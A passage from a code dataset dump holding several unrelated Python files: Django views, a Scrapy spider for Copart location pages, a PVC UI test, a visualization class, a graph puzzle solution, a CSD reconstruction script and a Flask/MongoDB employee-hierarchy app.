center=centers_,\n                                scale=scales_,\n                                pose=poses_,\n                                shape=shapes_,\n                                part=parts_,\n                                gender=genders_,\n                                smpl_j3d=smpl_j3ds_,\n                                smpl_j2d=smpl_j2ds_,\n                                )\n                if debug:\n                    # write to video\n                    for idx, imagename in enumerate(imgnames_):\n                        imagename = os.path.join(out_path,'3dpw', imagename)\n                        if idx ==0:\n                            fps = 30\n                            fourcc = cv2.VideoWriter_fourcc('M','J','P','G')\n                            video_path = out_file.replace('.npz', '.avi')\n                            frame = cv2.imread(imagename)\n                            frame_size = (frame.shape[1], frame.shape[0])\n                            videoWriter = cv2.VideoWriter(video_path,fourcc,fps,frame_size)\n                            videoWriter.write(frame)\n                        else:\n                            frame = cv2.imread(imagename)\n                            videoWriter.write(frame)\n                    videoWriter.release()\n","sub_path":"utils/data_preprocess/pw3d_process.py","file_name":"pw3d_process.py","file_ext":"py","file_size_in_byte":8178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"51065379","text":"from django.shortcuts import render, redirect, reverse\nfrom django.core.mail import send_mail, BadHeaderError\nfrom django.conf import settings\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom .forms import ContactForm\n\n\ndef index(request):\n    \"\"\" A view to return the index page \"\"\"\n\n    return render(request, 'home/index.html')\n\n\ndef about(request):\n    \"\"\"A view to return the about page\"\"\"\n\n    return render(request, 'home/about.html')\n\n\ndef faqs(request):\n    \"\"\"A view to return the faqs page\"\"\"\n\n    return render(request, 'home/faqs.html')\n\n\ndef contact_us(request):\n    \"\"\"\n    Send an email to the admin\n    when site visitors send message via contact form\n    \"\"\"\n    if request.method == 'POST':\n        contact_form = ContactForm(request.POST)\n        if contact_form.is_valid():\n            name = contact_form.cleaned_data['name']\n            email = contact_form.cleaned_data['email']\n            message = contact_form.cleaned_data['message']\n            try:\n                send_mail(\n                    f\"You've got a message from {name} ({email}) on contact form.\",\n                    message,\n                    email,\n                    [settings.DEFAULT_FROM_EMAIL],\n                )\n            except BadHeaderError:\n                return HttpResponse('Invalid header found.')\n            return redirect('contact_thankyou')\n    context = {\n        'contact_form': ContactForm \n    }\n    return render(request, 'home/contact_us.html', context)\n\n\ndef contact_thankyou(request):\n    \"\"\"\n    A view to return contact_thankyou page in order \\\n        to inform user that the message was succseddfully sent\n    \"\"\"\n    return render(request, 'home/contact_thankyou.html')\n","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"585643862","text":"from scrapy import Spider, Request\nimport scrapy\nfrom scrapy_splash import SplashRequest\nimport requests,re,json\nfrom bs4 import BeautifulSoup\n\nclass MySpider(scrapy.Spider):\n    name = \"location\"\n    start_urls=[]\n\n    copart_data={}\n    copart_array=[]\n    with open('copart.json') as f:\n        datas = json.load(f)\n    #for data in datas:\n     #   start_urls.append(data[\"href\"])\n    #start_urls = [\"https://www.copart.com/locations/north-boston-ma-53\"]\n    start_urls=[\"anchorage-ak-113\",\"no-nv-195\",\"drive-dallas-tx-370\",\"moncton-nb-206\",\"halifax-ns-207\"]\n\n    def start_requests(self):\n        for url in self.start_urls:\n            yield SplashRequest(\"https://www.copart.com/locations/\"+url, self.parse, args={'wait': 15})\n\n    def parse(self, response):\n\n        object={}\n        soup = BeautifulSoup(response.body, 'html.parser')\n\n        #location = soup.find(\"td\", {\"data-label\": \"Sale Name\"})\n        #location = location.a.text\n        #location = location.split(\"-\")[1]\n        #location = location.strip()\n        # print(location)\n        #object['Name'] = location\n        self.copart_array.append(object)\n        #info = soup.find(class_=\"locationlist-header\")\n        states = soup.find(\"div\",{\"class\":\" loc-icon-address loc-detail-infofix col-xs-5 loc-details-down\"})\n        #print(\"start----------------------\")\n        index=0\n\n\n\n        phone=states.find_all('p')\n\n        object['Phone']=re.sub('[^A-Za-z0-9]+', '', phone[0].text)\n        object['Fax'] = re.sub('[^A-Za-z0-9]+', '', phone[1].text)\n            #print(ph.text)\n\n        manager=soup.find(\"div\",{\"class\":\"col-xs-7 loc-icon-address \"})\n        managers=manager.find_all('a')\n        object['Manager'] =managers[0].text\n        object['Email'] = managers[0]['href'].split(':')[1]\n        object['ManagerRegional'] = managers[1].text\n        object['EmailRegional'] = managers[1]['href'].split(':')[1]\n\n        #for bb in manager.find_all('a'):\n         #   print(bb.text)\n          #  email=bb['href']\n           # email = email.split(':')[1]\n            #print(email)\n        location=soup.find(\"div\",{\"class\":\"location-yard-address\"})\n        address=location.find_all(\"p\",{\"class\":\"loc-detail-infofix\"})\n        #for add in address:\n        a=re.sub('\\s+', ' ', address[0].text)\n        object['Location'] = a.strip()\n\n        a = re.sub('\\s+', ' ', address[1].text)\n        object['MailingAddress'] = a.strip()\n        #print(a.strip()\n\n        self.copart_data['Copart']=self.copart_array\n        with open('location.json', 'w') as file:\n            json.dump(self.copart_data, file)\n\n\n\n\n\n\n\n\n\n","sub_path":"copart/copart/spiders/location.py","file_name":"location.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"361684503","text":"#coding:utf-8\nfrom django.contrib.auth.models import User, Group\nfrom common.models import Staff, Department, Division, Project\n\ndef get_divdir(user):\n    \n    staff = Staff.objects.get(pk=user.id)\n    \n    div = None\n    if staff.department:\n        div = staff.department.division\n    elif staff.section:\n        div = staff.section.department.division\n    else:\n        div = staff.division\n    \n    if div:\n        if div.director:\n            divdir = div.director\n        else:\n            try:\n                divdir = Staff.objects.get(division=div, position__code_name='div_dir', is_active=True)\n            except:\n                return staff\n        \n        return Staff.objects.get(pk=divdir.id)\n    else:\n        return staff\n\ndef get_depmgr(user):\n    staff = Staff.objects.get(pk=user.id)\n    \n    if staff.department:\n        dept = staff.department\n        if dept.manager:\n            depmgr = dept.manager\n        else:\n            try:\n                depmgr = Staff.objects.get(department=dept, position__code_name='dep_mgr', is_active=True)\n            except:\n                return staff\n        \n        return Staff.objects.get(pk=depmgr.id)\n    else :\n        return staff","sub_path":"src/payment/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"517866445","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom Visualizations import Visualization\nfrom Filter import prepare_dataframe\n\n\n\n\nclass BarChart(Visualization): \n\n    def __init__(self, dataframe, x_encoding, y_encoding, keywords=None):\n        super().__init__(dataframe, \"BarChart\", keywords)\n        #Class variables \n        self.x_encoding = {\n            \"aggregate\": x_encoding[\"aggregate\"],\n            \"field\": x_encoding[\"field\"],\n            \"type\": x_encoding[\"type\"]\n        }\n        self.y_encoding = {\n            \"aggregate\": y_encoding[\"aggregate\"],\n            \"field\": y_encoding[\"field\"],\n            \"type\": y_encoding[\"type\"]\n        }\n    \n    #return  x-encoding\n    def get_x_encoding(self): \n        return self.x_encoding\n    \n    #return  y-encoding\n    def get_y_encoding(self): \n        return self.y_encoding\n\n    #Equivalent to set_fields/set_axis function\n    def set_fields(self, xaxis=None, yaxis=None):\n        if not xaxis==None:\n            self.x_encoding[\"field\"] = xaxis\n        if not yaxis==None:    \n            self.y_encoding[\"field\"] = yaxis\n\n    #change aggregate of x-axis/y-axis\n    def set_aggregate(self, xaggregate=None, yaggregate=None):\n        self.x_encoding[\"aggregate\"] = xaggregate\n        self.y_encoding[\"aggregate\"] = yaggregate\n         \n    def normalize_values(self, maxsum):\n        if not (self.dataframe_prepared.empty): \n            if self.y_encoding[\"type\"]==\"quantitative\" : \n                if maxsum == \"max\":\n                    max_value = self.dataframe_prepared[self.y_encoding[\"field\"]].max()\n                    min_value = self.dataframe_prepared[self.y_encoding[\"field\"]].min()\n                    self.dataframe_prepared[self.y_encoding[\"field\"]] = (self.dataframe_prepared[self.y_encoding[\"field\"]] - min_value) / (max_value - min_value)\n                    return self.dataframe_prepared\n                elif maxsum == \"sum\":\n                    sum_value = self.dataframe_prepared[self.y_encoding[\"field\"]].sum()\n                    min_value = self.dataframe_prepared[self.y_encoding[\"field\"]].min()\n                    self.dataframe_prepared[self.y_encoding[\"field\"]] = (self.dataframe_prepared[self.y_encoding[\"field\"]]) / (sum_value)\n                    return self.dataframe_prepared\n    #applies all properties/keywords/encodings and returns the data\n    def get_data(self):\n        self.dataframe_prepared = prepare_dataframe(self.dataframe,self.x_encoding[\"field\"],self.y_encoding[\"field\"],self.y_encoding[\"aggregate\"], self.keywords)\n        return self.dataframe_prepared\n\n    #returns dictionnary with all information of the object \n    def serialize_object(self): \n        return {\"type\" : self.type, \"keywords\" : self.keywords, \"x_encoding\" : self.x_encoding, \"y_encoding\" : self.y_encoding}","sub_path":"Backend/Visualization/BarChart.py","file_name":"BarChart.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"109464513","text":"import logging\nimport pytest\nimport time\n\nfrom ocs_ci.framework.pytest_customization.marks import tier1\nfrom ocs_ci.ocs.ui.pvc_ui import PvcUI\nfrom ocs_ci.framework.testlib import skipif_ocs_version, skipif_ocp_version\nfrom ocs_ci.ocs.resources.pvc import get_all_pvc_objs, delete_pvcs\n\nlogger = logging.getLogger(__name__)\n\n\nclass TestPvcUserInterface(object):\n    \"\"\"\n    Test PVC User Interface\n\n    \"\"\"\n\n    def teardown(self):\n        pvc_objs = get_all_pvc_objs(namespace=\"openshift-storage\")\n        pvcs = [pvc_obj for pvc_obj in pvc_objs if \"test-pvc\" in pvc_obj.name]\n        delete_pvcs(pvc_objs=pvcs)\n\n    @tier1\n    @skipif_ocs_version(\"<4.6\")\n    @pytest.mark.parametrize(\n        argnames=[\"sc_type\", \"pvc_name\", \"access_mode\", \"pvc_size\", \"vol_mode\"],\n        argvalues=[\n            pytest.param(\n                \"ocs-storagecluster-cephfs\",\n                \"test-pvc-fs\",\n                \"ReadWriteMany\",\n                \"2\",\n                \"Filesystem\",\n            ),\n            pytest.param(\n                \"ocs-storagecluster-ceph-rbd\",\n                \"test-pvc-rbd\",\n                \"ReadWriteMany\",\n                \"3\",\n                \"Block\",\n            ),\n            pytest.param(\n                \"ocs-storagecluster-ceph-rbd-thick\",\n                \"test-pvc-rbd-thick\",\n                \"ReadWriteMany\",\n                \"4\",\n                \"Block\",\n                marks=[skipif_ocp_version(\"<4.8\")],\n            ),\n            pytest.param(\n                \"ocs-storagecluster-cephfs\",\n                \"test-pvc-fs\",\n                \"ReadWriteOnce\",\n                \"10\",\n                \"Filesystem\",\n            ),\n            pytest.param(\n                \"ocs-storagecluster-ceph-rbd\",\n                \"test-pvc-rbd\",\n                \"ReadWriteOnce\",\n                \"11\",\n                \"Block\",\n            ),\n            pytest.param(\n                \"ocs-storagecluster-ceph-rbd-thick\",\n                \"test-pvc-rbd-thick\",\n                \"ReadWriteOnce\",\n                \"12\",\n                \"Block\",\n                marks=[skipif_ocp_version(\"<4.8\")],\n            ),\n            pytest.param(\n                \"ocs-storagecluster-ceph-rbd\",\n                \"test-pvc-rbd\",\n                \"ReadWriteOnce\",\n                \"13\",\n                \"Filesystem\",\n            ),\n            pytest.param(\n                \"ocs-storagecluster-ceph-rbd-thick\",\n                \"test-pvc-rbd-thick\",\n                \"ReadWriteOnce\",\n                \"4\",\n                \"Filesystem\",\n                marks=[skipif_ocp_version(\"<4.8\")],\n            ),\n        ],\n    )\n    def test_create_delete_pvc(\n        self, setup_ui, sc_type, pvc_name, access_mode, pvc_size, vol_mode\n    ):\n        \"\"\"\n        Test create and delete pvc via UI\n\n        \"\"\"\n        pvc_ui_obj = PvcUI(setup_ui)\n        pvc_ui_obj.create_pvc_ui(sc_type, pvc_name, access_mode, pvc_size, vol_mode)\n        time.sleep(2)\n\n        pvc_objs = get_all_pvc_objs(namespace=\"openshift-storage\")\n        pvc = [pvc_obj for pvc_obj in pvc_objs if pvc_obj.name == pvc_name]\n\n        assert pvc[0].size == int(pvc_size), (\n            f\"size error| expected size:{pvc_size} \\n \"\n            f\"actual size:{str(pvc[0].size)}\"\n        )\n\n        assert pvc[0].get_pvc_access_mode == access_mode, (\n            f\"access mode error| expected access mode:{access_mode} \"\n            f\"\\n actual access mode:{pvc[0].get_pvc_access_mode}\"\n        )\n\n        assert pvc[0].backed_sc == sc_type, (\n            f\"storage class error| expected storage class:{sc_type} \"\n            f\"\\n actual storage class:{pvc[0].backed_sc}\"\n        )\n\n        assert pvc[0].get_pvc_vol_mode == vol_mode, (\n            f\"volume mode error| expected volume mode:{vol_mode} \"\n            f\"\\n actual volume mode:{pvc[0].get_pvc_vol_mode}\"\n        )\n\n        logger.info(\"Verifying PVC Details via UI\")\n        pvc_ui_obj.verify_pvc_ui(\n            pvc_size=pvc_size,\n            access_mode=access_mode,\n            vol_mode=vol_mode,\n            sc_type=sc_type,\n        )\n        logger.info(\"PVC Details Verified via UI..!!\")\n\n        logger.info(f\"Delete {pvc_name} pvc\")\n        pvc_ui_obj.delete_pvc_ui(pvc_name)\n        time.sleep(5)\n\n        pvc_objs = get_all_pvc_objs(namespace=\"openshift-storage\")\n        pvcs = [pvc_obj for pvc_obj in pvc_objs if pvc_obj.name == pvc_name]\n        if len(pvcs) > 0:\n            assert f\"PVC {pvcs[0].name} does not deleted\"\n","sub_path":"tests/ui/test_pvc_ui.py","file_name":"test_pvc_ui.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"353493042","text":"from testing.testcase import TestCase\nfrom unittest.mock import patch\nfrom . import url\n\n\n\nclass TestUrl(TestCase):\n\n  @patch('plugins.url.getTitle')\n  @patch('plugins.url.shorten')\n  def test_with_both(self, shorten, title):\n    shorten.return_value = \"SHORTURL\"\n    title.return_value = \"TITLE\"\n    self.alice.say(\"http://longurl.com/withmoreurl\")\n    self.alice.assertMsg(url.outputFmt.format(\n      short = url.shortFmt.format(\"SHORTURL\"),\n      delim = url.delim,\n      title = url.titleFmt.format(\"TITLE\")))\n\n\n  @patch('plugins.url.getTitle')\n  @patch('plugins.url.shorten')\n  def test_only_title(self, shorten, title):\n    title.return_value=\"Short.com title\"\n    self.alice.say(\"http://short.com\")\n    shorten.assert_has_calls([]) # no calls to shorten.\n    self.alice.assertMsg(url.outputFmt.format(\n      short = \"\",\n      delim = \"\",\n      title = url.titleFmt.format(\"Short.com title\")))\n\n\n  @patch('plugins.url.getTitle')\n  @patch('plugins.url.shorten')\n  def test_only_short(self, shorten, title):\n    shorten.return_value = \"SHORTURL\"\n    title.return_value = \"\"\n\n    self.alice.say(\"http://someUrlWithoutATitle.com/longUrl\")\n    self.alice.assertMsg(url.outputFmt.format(\n      short = url.shortFmt.format(\"SHORTURL\"),\n      delim =\"\",\n      title =\"\"\n    ))\n\n  def test_neither(self):\n    self.alice.say(\"No urls here\")\n    self.alice.assertNoMsg()\n\n","sub_path":"plugins/url_test.py","file_name":"url_test.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"487344173","text":"# a simple parser for python. use get_number() and get_word() to read\ndef parser():\n    while 1:\n        data = list(input().split(' '))\n        for number in data:\n            if len(number) > 0:\n                yield(number)\n\ninput_parser = parser()\n\ndef get_word():\n    global input_parser\n    return next(input_parser)\n\ndef get_number():\n    data = get_word()\n    try:\n        return int(data)\n    except ValueError:\n        return float(data)\n\n# numpy and scipy are available for use\nimport numpy\nimport scipy\nfrom collections import defaultdict\n\n\n\n# class Graph():\n#     def __init__(self,vertices):\n#         self.graph = defaultdict(list)\n#         self.V = vertices\n\n#     def addEdge(self,u,v):\n#         self.graph[u].append(v)\n\n#     def isCyclicUtil(self, v, visited, recStack):\n\n#         # Mark current node as visited and\n#         # adds to recursion stack\n#         visited[v] = True\n#         recStack[v] = True\n\n#         # Recur for all neighbours\n#         # if any neighbour is visited and in\n#         # recStack then graph is cyclic\n#         for neighbour in self.graph[v]:\n#             if visited[neighbour] == False:\n#                 if self.isCyclicUtil(neighbour, visited, recStack) == True:\n#                     return True\n#             elif recStack[neighbour] == True:\n#                 return True\n\n#         # The node needs to be poped from\n#         # recursion stack before function ends\n#         recStack[v] = False\n#         return False\n\n#     # Returns true if graph is cyclic else false\n#     def isCyclic(self):\n#         visited = [False] * (self.V + 1)\n#         recStack = [False] * (self.V + 1)\n#         for node in range(self.V):\n#             if visited[node] == False:\n#                 if self.isCyclicUtil(node,visited,recStack) == True:\n#                     return True\n#         return False\n\n\nclass Graph:\n\n    def __init__(self,vertices):\n        self.V= vertices #No. of vertices\n        self.graph = defaultdict(list) # default dictionary to store graph\n\n    # function to add an edge to graph\n    def addEdge(self,u,v):\n        self.graph[u].append(v)\n\n    def replaceEdge(self, u, old, new):\n        self.graph[u].remove(old)\n        self.graph[u].append(new)\n\n     # Use BFS to check path between s and d\n    def isReachable(self, s, d):\n        # Mark all the vertices as not visited\n        visited =[False]*(self.V)\n\n        # Create a queue for BFS\n        queue=[]\n\n        # Mark the source node as visited and enqueue it\n        queue.append(s)\n        visited[s] = True\n\n        while queue:\n\n            #Dequeue a vertex from queue\n            n = queue.pop(0)\n\n            # If this adjacent node is the destination node,\n            # then return true\n            if n == d:\n                return True\n\n            #  Else, continue to do BFS\n            for i in self.graph[n]:\n                if visited[i] == False:\n                    queue.append(i)\n                    visited[i] = True\n        # If BFS is complete without visited d\n        return False\n\ndef getDistance(v, goesTo):\n    dist = 0\n    while (goesTo[v] != -1):\n        dist += 1\n        v = goesTo[v]\n    return dist\n\n\nimport numpy as np\naaa = 0\nT = get_number()\nfor _ in range(T):\n    nr = get_number()\n    nb = get_number()\n    E = get_number()\n\n    name2idx = {}\n    idx2name = []\n    id = 0\n    for i in range(1, nr+1):\n        key = \"R\" + str(i)\n        name2idx[key] = id\n        idx2name.append(key)\n        id += 1\n\n    for i in range(1, nb+1):\n        key = \"B\" + str(i)\n        name2idx[key] = id\n        idx2name.append(key)\n        id += 1\n\n\n    g = Graph(nr+nb)\n    # adj = np.zeros((nr+nb, nr+nb), dtype=int)\n\n    goesTo = [-1 for _ in range(nr+nb)]\n\n    for i in range(1, nr):\n        inferior_name = \"R\" + str(i+1)\n        senior_name = get_word()\n        inferior_idx = name2idx[inferior_name]\n        senior_idx = name2idx[senior_name]\n        g.addEdge(inferior_idx, senior_idx)\n        # adj[inferior_idx][senior_idx] = 1\n        goesTo[inferior_idx] = senior_idx\n\n    for i in range(1, nb):\n        inferior_name = \"B\" + str(i+1)\n        senior_name = get_word()\n        inferior_idx = name2idx[inferior_name]\n        senior_idx = name2idx[senior_name]\n        g.addEdge(inferior_idx, senior_idx)\n        # adj[inferior_idx][senior_idx] = 1\n        goesTo[inferior_idx] = senior_idx\n\n\n\n\n    for e in range(E):\n        event = get_word()\n        name_a = get_word()\n        name_b = get_word()\n        if event == \"w\":\n            idx_start_R = name2idx[name_a]\n            idx_start_B = name2idx[name_b]\n            R1 = name2idx[\"R1\"]\n            B1 = name2idx[\"B1\"]\n\n\n\n            r2r_exists = g.isReachable(idx_start_R, R1)\n            b2b_exists = g.isReachable(idx_start_B, B1)\n            b2r_exists = g.isReachable(idx_start_B, R1)\n            r2b_exists = g.isReachable(idx_start_R, B1)\n\n            isNone = not (r2r_exists or b2b_exists or b2r_exists or r2b_exists)\n\n            # if (aaa == 2):\n            #     print(r2r_exists, b2b_exists, b2r_exists, r2b_exists)\n            #     break\n            # aaa += 1\n\n\n\n            if (isNone):\n                print(\"NONE\")\n            else:\n                if r2r_exists:\n                    r2r_dist = getDistance(idx_start_R, goesTo)\n                    if b2b_exists:\n                        b2b_dist = getDistance(idx_start_B, goesTo)\n                        if r2r_dist < b2b_dist:\n                            print(\"RED\", r2r_dist)\n                        elif r2r_dist > b2b_dist:\n                            print(\"BLUE\", b2b_dist)\n                        else:\n                            print(\"TIE\", r2r_dist)\n                    elif b2r_exists:\n                        b2r_dist = getDistance(idx_start_B, goesTo)\n                        print(\"RED\", min(r2r_dist, b2r_dist))\n                    else:\n                        print(\"RED\", r2r_dist)\n                elif b2b_exists:\n                    b2b_dist = getDistance(idx_start_B, goesTo)\n                    if r2b_exists:\n                        r2b_dist = getDistance(idx_start_R, goesTo)\n                        print(\"BLUE\", min(b2b_dist, r2b_dist))\n                    else:\n                        print(\"BLUE\", b2b_dist)\n                else:\n                    if b2r_exists and r2b_exists:\n                        b2r_dist = getDistance(idx_start_B, goesTo)\n                        r2b_dist = getDistance(idx_Start_R, goesTo)\n                        if b2r_dist < r2b_dist:\n                            print(\"RED\", b2r_dist)\n                        elif b2r_dist > r2b_dist:\n                            print(\"BLUE\", b2r_dist)\n                        else:\n                            print(\"TIE\", b2r_dist)\n                    elif b2r_exists and (not r2b_exists):\n                        b2r_dist = getDistance(idx_start_B, goesTo)\n                        print(\"RED\", b2r_dist)\n                    elif (not b2r_exists) and r2b_exists:\n                        r2b_dist = getDistance(idx_start_R, goesTo)\n                        print(\"BLUE\", r2b_dist)\n\n            # print(aaa)\n            # aaa+=1\n\n\n\n        elif event == \"c\":\n            idx_a = name2idx[name_a]\n            idx_b = name2idx[name_b]\n            u = idx_a\n            old = goesTo[idx_a]\n            new = idx_b\n            goesTo[idx_a] = idx_b\n            g.replaceEdge(u, old, new)\n","sub_path":"gamimenadentrakia.py","file_name":"gamimenadentrakia.py","file_ext":"py","file_size_in_byte":7371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"555575251","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: mbejtka\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport itertools\nimport time\n\nfrom kesi._verbose import (VerboseFFR,\n                           LinearMixture,\n                           LoadableVerboseFFR, _CrossKernelReconstructor)\nfrom kesi._engine import _LinearKernelSolver\nfrom FEM.fem_sphere_gaussian import (SomeSphereGaussianSourceFactory3D,\n                                     SomeSphereGaussianSourceFactoryOnlyCSD)\nfrom _common_new import altitude_azimuth_mesh\n\nMeasurementManagerBase = VerboseFFR.MeasurementManagerBase\n\n\nclass MeasurementManager(MeasurementManagerBase):\n    def __init__(self, ELECTRODES, space='potential'):\n        self._space = space\n        self._ELECTRODES = ELECTRODES\n        self.number_of_measurements = len(ELECTRODES)\n    def probe(self, field):\n        return getattr(field, \n                       self._space)(self._ELECTRODES.X,\n                                    self._ELECTRODES.Y,\n                                    self._ELECTRODES.Z)\n\ndef all_sources(factory, rs, altitudes, azimuths):\n    return [factory(r, altitude, azimuth)\n            for r, altitude, azimuth in itertools.product(rs, altitudes, azimuths)]\n\ndef cross_kernel_estimation(loadable_reconstructor, measurement_manager_basis,\n                            potential, regularization_parameter=0):\n    kernel = loadable_reconstructor.kernel\n    cross_kernel = loadable_reconstructor.get_kernel_matrix(measurement_manager_basis)\n    cross_reconstructor = _CrossKernelReconstructor(_LinearKernelSolver(kernel), cross_kernel)\n    est_csd = cross_reconstructor(potential, regularization_parameter)\n    return est_csd\n\ndef verbose_estimation(reconstructor, potential, EST_X, EST_Y, EST_Z,\n                       regularization_parameter=0):\n    approximator = reconstructor(potential, regularization_parameter)\n    est_csd = approximator.csd(EST_X, EST_Y, EST_Z)\n    return est_csd\n\nMESHFILE = '/home/mbejtka/Data_Kuba/one_sphere_gaussian_1000_deg_1.npz'\nfactory = SomeSphereGaussianSourceFactory3D(MESHFILE)\n\ndst = factory.R[1] - factory.R[0]\nsources = [factory(r, altitude, azimuth)\n           for altitude, azimuth in altitude_azimuth_mesh(-np.pi/2,\n                                                          dst/factory.scalp_radius)\n           for r in factory.R]\n\n# Electrodes\ntheta, phi, r = np.meshgrid(np.linspace(-0.5*np.pi, 0.5*np.pi, 15),\n                           np.linspace(0, 2*np.pi, 15),\n                           [factory.R.max()])\nELE_X = r*np.cos(theta)*np.cos(phi)\nELE_Y = r*np.cos(theta)*np.sin(phi)\nELE_Z = r*np.sin(theta)\nELECTRODES = pd.DataFrame({'X': ELE_X.flatten(),\n                           'Y': ELE_Y.flatten(),\n                           'Z': ELE_Z.flatten()})\n\n# Estimating points    \nr = factory.scalp_radius\nEST_X, EST_Y, EST_Z = np.meshgrid(np.linspace(-r, r, 30),\n                                  np.linspace(-r, r, 30),\n                                  np.linspace(-r, r, 30))\ninside_sphere = np.array(np.where(EST_X.flatten()**2 + EST_Y.flatten()**2 + EST_Z.flatten()**2 <=r**2))\nEST_X = EST_X.flatten()[inside_sphere[0]]\nEST_Y = EST_Y.flatten()[inside_sphere[0]]\nEST_Z = EST_Z.flatten()[inside_sphere[0]]\nEST_POINTS =pd.DataFrame({'X': EST_X.flatten(),\n                          'Y': EST_Y.flatten(),\n                          'Z': EST_Z.flatten()})\n    \nmeasurement_manager = MeasurementManager(ELECTRODES, space='potential')\nmeasurement_manager_basis = MeasurementManager(EST_POINTS, space='csd')\n\n# Create reconstructor\nreconstructor_filename = 'SavedReconstructor_one_sphere_1000_deg_1.npz'\nreconstructor = VerboseFFR(sources, measurement_manager)\nreconstructor.save(reconstructor_filename)\n\n# Generate ground truth (true_csd)\n#factory2 = SomeSphereGaussianSourceFactory3D(MESHFILE)\ntrue_csd = factory(factory.R[0], 0, 0)\npotential = measurement_manager.probe(true_csd)\n\nfactory = SomeSphereGaussianSourceFactoryOnlyCSD(MESHFILE)\ndst = factory.R[1] - factory.R[0]\nsources = [factory(r, altitude, azimuth)\n           for altitude, azimuth in altitude_azimuth_mesh(-np.pi/2,\n                                                          dst/factory.scalp_radius)\n           for r in factory.R]\n# Load saved reconstructor\nloadable_reconstructor = LoadableVerboseFFR(reconstructor_filename, sources, measurement_manager)\n#\n## Create cross kernel reconstructor\n#kernel = loadable_reconstructor.kernel\n#cross_kernel = loadable_reconstructor.get_kernel_matrix(measurement_manager_basis)\n#cross_reconstructor = _CrossKernelReconstructor(_LinearKernelSolver(kernel), cross_kernel)\n#\n## Estimate solution\n#est_csd = cross_reconstructor(potential, regularization_parameter=0)\n\n# Save estimated data\n#approximator_filename = 'Estimated_data_one_sphere_1000_deg_1.npz'\n#np.savez_compressed(approximator_filename, CSD=est_csd,\n#                    EST_X=EST_X,\n#                    EST_Y=EST_Y,\n#                    EST_Z=EST_Z, CROSS_KERNEL=cross_kernel) \n#utbs = abs(np.matmul(eigenvectors.T, potential))\nt1 = time.time()\ncross_csd = cross_kernel_estimation(loadable_reconstructor, measurement_manager_basis, potential, regularization_parameter=0)\nprint('cross kernel: ', time.time() - t1)\n#%timeit cross_kernel_estimation(loadable_reconstructor, measurement_manager_basis, potential, regularization_parameter=0)                                      \n##14min 43s ± 1.68 s per loop (mean ± std. dev. of 7 runs, 1 loop each)\n\n#%timeit cross_reconstructor(potential, regularization_parameter=0)      \n##1.31 ms ± 35.7 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n\nt2 = time.time()\nverbose_csd = verbose_estimation(reconstructor, potential, EST_X, EST_Y, EST_Z,\n                                 regularization_parameter=0)\nprint('verbose: ', time.time() - t2)\n\n#%timeit verbose_estimation(reconstructor, potential, EST_X, EST_Y, EST_Z)                                                                                      \n##30.2 s ± 9.1 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)","sub_path":"extras/reconstructor_performance.py","file_name":"reconstructor_performance.py","file_ext":"py","file_size_in_byte":6012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"164519790","text":"from flask import Flask,render_template,redirect,request\nimport pymongo\n\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")#connect to mongoDB server\nmyclient.drop_database('mydatabase')#drop if any database exist with same name\ndb = myclient[\"mydatabase\"]#create database \"db\"\nmycol = db[\"customers\"]#create table mycol\napp = Flask(__name__)#inform flask that web app name is \"app\" which is used later as \"@app\"\n\nmydict = { \"name\": \"Sanjeev\", \"designation\": \"CEO\",\"rman\":\"None\" ,'under':[]}\nx = mycol.insert(mydict)#adding the first employee (top of hierarchy)\n\ndef make_list(l,down,index):\n    k = index#current employee index {for CEO=0}\n    emp = mycol.find_one({'_id':l[index]})#get the Complete Object of current Object\n    down.append(len(emp['under']))#count of employees under current employee\n    for e in emp['under']:#for each Object id in \"under\" Field \n        l.append(e) #append it to list \"l\"\n        k = make_list(l,down,k+1)#recursively call funtion and keep updating the index for next iteration in DFS logic \n    return k#it will update the parent recursive call index (increment by one if no employee under current employee) \n@app.route('/list')\ndef my_list():\n    emp = mycol.find_one({'designation':\"CEO\"})#start with the CEO for displaying the Hierarchy\n    lis=[]#initiasing the empty list to store the object ID's of the employee\n    lis.append(emp['_id'])#append CEO id\n    down=[]#initiasing the empty list to store the count of the employee under each employee\n    make_list(lis,down,0)#function will update the list(both \"lis\" and \"down\") with by traversing the employees in depth first search\n    #above \"0\" is used to start with CEO\n    gg=[]#store the details of employee to pass to HTML page to display\n    for l in lis:#for each Object Id in lis list fetch the whole object and append the \"gg\" list with details of each employee\n        h = mycol.find_one({'_id':l})#return the complete Object with given Id\n        gg.append([h['name'],h['designation']])#only name and designation are appended each Employee\n    return render_template(\"list.html\",gg=gg,down=down)#gg is passed as gg and down is passed as down\n#render template is used to redirect to given page with required parameters\n\t\n@app.route('/input', methods=['GET','POST'])\ndef my_form_post():\n    if request.method=='POST':\n        name = request.form['name']\n        designation = request.form['desig']\n        rman = request.form['rman']\n        mydict = { \"name\": name, \"designation\":designation,\"rman\":rman,\"under\":[] }#object with data from FORM\n        if rman==\"None\":#for the first employee no reporting manager will be there so enter \"None\"\n       \t    mycol.insert(mydict)#add to database's table\n       \telse:\n       \t    man = 